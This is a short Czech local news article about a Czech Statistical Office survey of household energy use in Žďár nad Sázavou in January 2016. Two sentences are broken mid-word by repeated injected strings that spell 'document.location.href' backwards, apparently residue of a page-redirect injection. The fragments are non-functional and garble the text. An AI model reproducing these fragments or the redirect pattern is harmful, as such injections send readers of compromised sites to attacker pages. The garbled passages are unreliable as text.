Rainbow page separator

Statistici navštěvují domácnosti do poloviny ledna

Úterý, 12. ledna 2016

Křižovatka Brodská a Revoluční ulice Žďár nad Sázavou

Žďár nad Sázavou / Výběrové šetření o energetické spotřebě v domácnostech v těch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to dnech provádí ve Žďáře Český statistický úřad. Hlavním cílem šetření je získaní aktuálních údajů o spotřebě paliv a energií v jednotlivých domácnostech podle účelu použití na konkrétní činnost.
Vlastní šetření ve městě probíhá do 15. ledna, přičemž domácnosti navštěvují speciálně vyškolení tazatelé. Ti[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to pracovníci Českého statistického úřadu zapojení do šetření o energetické spotřebě v domácnostech se lidem, kteří s nimi budou ochotní spolupracovat, prokazují průkazem tazatele a příslušným pověřením.
Ve všech fázích zpracování je zaručena anonymita zjištěných údajů a data jsou chráněna před zneužitím.